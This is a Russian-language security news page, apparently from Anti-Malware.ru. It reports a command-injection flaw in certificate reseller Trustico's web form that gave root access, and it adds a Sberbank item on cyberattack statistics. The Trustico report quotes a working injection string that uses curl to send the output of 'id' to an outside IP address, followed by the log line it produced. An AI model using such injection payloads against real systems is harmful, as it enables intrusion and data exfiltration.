Все сертификаты Trustico отзовут из-за полной компрометации сервера

Все сертификаты Trustico отзовут из-за полной компрометации сервера

Ранее освещенная история с проблемными сертификатами, полученными через реселлера Trustico, усугубилась новыми подробностями. В веб-интерфейсе сервиса была обнаружена уязвимость, позволяющая получить к серверу root-доступ.

Если раньше эксперты только гадали, что может быть причиной того, что Trustico решила отозвать выданные сертификаты, то сейчас ситуация начинает проясняться. Похоже, что такое решение связано с киберинцидентом, подорвавшим безопасность реселлера.

Сама брешь имеет довольно посредственный характер — допускается ввод без экранирования спецсимволов. Таким образом, если кто-либо введет в форме проверки сертификата шелл-операторы, они будут исполнены на серверы с правами root.

Об этой проблеме сообщили эксперты Manawyrm и Predrag Cujanović в Twitter.

В качестве примера специалисты приводят ввод следующую строку:

$(curl https://3.5.6.9/`id`)

Которая отправит на хост запрос:

3.5.6.9 - [01/Mar/2018:09:52:14 -0500] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

Сообщается, что на данный момент сайт Trustico недоступен. Специалистам пока не удалось выяснить, позволяет ли данная брешь скомпрометировать приватные ключи сертификатов, однако одному из исследователей удалось найти в конфигурации секретный ключ для SSL-сертификта домена «*.trustico.com».

Следовательно, в ближайшее время DigiCert и Comodo отреагируют на инцидент, что, скорее всего, приведет к отзыву всех выданных через Trustico сертификатов.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Сбербанк: В 2019 году кибератаки происходят каждые 14 секунд

Ссылаясь на исследование компании Cybersecurity Ventures, Сбербанк заявил, что в 2019 году кибератаки по всему миру происходят каждые 14 секунд. Также в кредитной организации заявили, что в этом году киберпреступники продолжат использовать социальную инженерию.

Что касается социальной инженерии, специалисты Сбербанка по итогам 2018 года отметили рост этого вида киберпреступлений на 6%. Исследователи также обращают внимание на утечки данных корпораций и целевые атаки на сотрудников — в 2019 году эти векторы станут главным вызовом для безопасников.

Помимо этого, Сбербанк предупреждает о растущей сумме ущерба от кибератак — это происходит естественным образом с увеличением их числа.

«Если в прошлом году убытки компаний различных секторов экономики составили 1,5 трлн долларов, то в 2019 году, по прогнозу Сбербанка, они достигнут уже 2,5 трлн. К 2022 году, по прогнозу Всемирного экономического форума, сумма планетарного ущерба от кибератак может вырасти до 8 трлн долларов», — заявили представители кредитной организации.

Сбербанк отметил, что ему ежедневно удается успешно отражать несколько тысяч атак на свои системы.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru